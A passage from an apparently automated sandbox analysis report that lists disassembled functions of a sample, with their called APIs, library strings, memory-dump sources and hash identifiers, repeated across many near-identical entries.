                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                                                                              • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                                                                                                                                                                                                                                              • API String ID: 2005118841-1273958906
                                                                                                                                                                                                                                              • Opcode ID: 3392c02335b785e9af068ff899a000b467aca5a66c26d499f5c9a46823bcec7b
                                                                                                                                                                                                                                              • Instruction ID: daf2ab8ff5d1bdd7257be023b6b2dbd1f6406002e79b64a87b30026b48bf1696
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3392c02335b785e9af068ff899a000b467aca5a66c26d499f5c9a46823bcec7b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D618371208380AFD321DB68C884FDFB7E8AF99348F114A5DE18D87741DB75A94887A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF2AE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strncmptype_info::operator!=
                                                                                                                                                                                                                                              • String ID: ThisPointer:$ValueNames
                                                                                                                                                                                                                                              • API String ID: 1333309372-2375088429
                                                                                                                                                                                                                                              • Opcode ID: 76d1d8ec1b9b59a7eed2c4960b32c568a00477335bbdb26bf7f620376a8e26c6
                                                                                                                                                                                                                                              • Instruction ID: 063467102c7535deb2f87ca32f81bb9ba6c63f690988d0595f5a47ac8b920d14
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76d1d8ec1b9b59a7eed2c4960b32c568a00477335bbdb26bf7f620376a8e26c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D451E8712087405BC315CFA5C890A67B7FAAF8535CF044A5DE9E68BF41C72AE8098761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF0A360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strncmptype_info::operator!=
                                                                                                                                                                                                                                              • String ID: ThisPointer:$ValueNames
                                                                                                                                                                                                                                              • API String ID: 1333309372-2375088429
                                                                                                                                                                                                                                              • Opcode ID: d41592d10f9d60cca4970a8aad3c8a3af3d296071baa674cd1b75cf61710fe25
                                                                                                                                                                                                                                              • Instruction ID: a2d96c2f45c273e85ff0ec9db20f6e96ec0269a1e13a8b3bc5e00e7eeddafd36
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d41592d10f9d60cca4970a8aad3c8a3af3d296071baa674cd1b75cf61710fe25
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B15105363083405BC314CF75C8A0A67BBFAAF9670CF154A1CE5D68BF91CB22E8098791
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF2B9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strncmptype_info::operator!=
                                                                                                                                                                                                                                              • String ID: ThisPointer:$ValueNames
                                                                                                                                                                                                                                              • API String ID: 1333309372-2375088429
                                                                                                                                                                                                                                              • Opcode ID: 0f5937a44d9a9161f530c2af05bf284e9152c72ec93a0abff8f2596948ee47ad
                                                                                                                                                                                                                                              • Instruction ID: 17362789b02d061a7aa9a1f06df3a9b8d194dfa7aa956ee457fcc3fee46c1478
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f5937a44d9a9161f530c2af05bf284e9152c72ec93a0abff8f2596948ee47ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4651B1312083455BC3148FAAC890A67BBFAAF96358F044E5DEDD78BB41CB26E809C751
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF11B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF11C1A
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF11CDE
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF11D3E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6CF11CF0
                                                                                                                                                                                                                                              • TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6CF11C67
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                              • String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
                                                                                                                                                                                                                                              • API String ID: 3476068407-3371871069
                                                                                                                                                                                                                                              • Opcode ID: a37adf457f36c1579e1ccfa5fbd783ccd3048be9588feed1297e038a5e0e547e
                                                                                                                                                                                                                                              • Instruction ID: 0fdd2f74ee26a6a4567b54bb24413a54a5b2928492048f38e7e818633bccb810
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a37adf457f36c1579e1ccfa5fbd783ccd3048be9588feed1297e038a5e0e547e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D515C712087419FD360DF68C880F9BB7E9BFD8704F108A1DE58987791DB75E9098BA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF3A90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF3B71
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF3B83
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF3BCF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Bound$Destroy
                                                                                                                                                                                                                                              • String ID: ljl$ljl
                                                                                                                                                                                                                                              • API String ID: 3651546500-1848646690
                                                                                                                                                                                                                                              • Opcode ID: b875abf6a2b4a1dc56549f145fa635fdeb86df77b04c44bb42e8880436627e26
                                                                                                                                                                                                                                              • Instruction ID: 8e6e0acd2e4f8fc46bc5d5af26b6c28551cd4bb8e7c799d50b255bf2b66ea6f5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b875abf6a2b4a1dc56549f145fa635fdeb86df77b04c44bb42e8880436627e26
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A041AA712086019FC711CF18C890E5AF7F9FBD9358F244A0EF8A497B50D670EC4A8BA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED4010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                                • Part of subcall function 6CF39125: std::exception::exception.LIBCMT ref: 6CF3913A
                                                                                                                                                                                                                                                • Part of subcall function 6CF39125: __CxxThrowException@8.LIBCMT ref: 6CF3914F
                                                                                                                                                                                                                                                • Part of subcall function 6CF39125: std::exception::exception.LIBCMT ref: 6CF39160
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED4067
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CED40C8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                              • API String ID: 1615890066-4289949731
                                                                                                                                                                                                                                              • Opcode ID: 488e18083f67b3714e961f88c993c35ea747724d7a1b97b99a02766710c2bc1c
                                                                                                                                                                                                                                              • Instruction ID: ebd89d69dbaac0bde1a1fb35656d1ff80a852337d70b7e1083e7048450c785fd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 488e18083f67b3714e961f88c993c35ea747724d7a1b97b99a02766710c2bc1c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E531B8323045109BD3209F5CE880A5AF7B9DBA1768F36062FF155CBB40D762A84287A3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF3C23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 6CF3C24E
                                                                                                                                                                                                                                                • Part of subcall function 6CF3C1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6CF3C1DF
                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6CF3C265
                                                                                                                                                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 6CF3C273
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                                                                                                                                                              • Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                                                                                                                                                                                                                              • Instruction ID: 9e6ef51501e7701b97a16c2013cedcf2284b296b7aa87f851c7761cd3d3a8ae2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32012431001529BBDF126F91CC40EEA7F6AEF08358F005110BD5C15A20DB76D8B2EBE4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF12300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                                                                                              • Opcode ID: e7a8ef73e74b3207ca4a3b4b448643f5438c9ee8b4ae099d7e0c307d2e5a23ec
                                                                                                                                                                                                                                              • Instruction ID: 641cd82535c1e7674755df78ce4501abb96182ecfe7c59b9c56264ecb4b1e6ca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7a8ef73e74b3207ca4a3b4b448643f5438c9ee8b4ae099d7e0c307d2e5a23ec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B99180B12087419FD714CF99D884A1BB7E9FF89704F204A2DE499C3B41E735E905CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF01D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Timetime$Sleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4176159691-0
                                                                                                                                                                                                                                              • Opcode ID: ca63af56d373badb2d5ea715c4e48e26205c403bff4db2d98540f8053a9c059a
                                                                                                                                                                                                                                              • Instruction ID: 7b62906d86554395c808f1c4247823d3e55f12a5755d2a1a46a64414436e391a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca63af56d373badb2d5ea715c4e48e26205c403bff4db2d98540f8053a9c059a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1851E0B1E11254AFEB01DFA8D891B9E7FB4BB05748F24846EE808D7B40D770DA04DBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE6D40 Relevance: 7.6, APIs: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • _rand.LIBCMT ref: 6CEE6DEA
                                                                                                                                                                                                                                                • Part of subcall function 6CF39E0C: __getptd.LIBCMT ref: 6CF39E0C
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEE6E17
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE6E2C
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEE6E3B
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE6E50
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C04
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C1E
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: __CxxThrowException@8.LIBCMT ref: 6CF39C2F
                                                                                                                                                                                                                                              Memory Dump Source
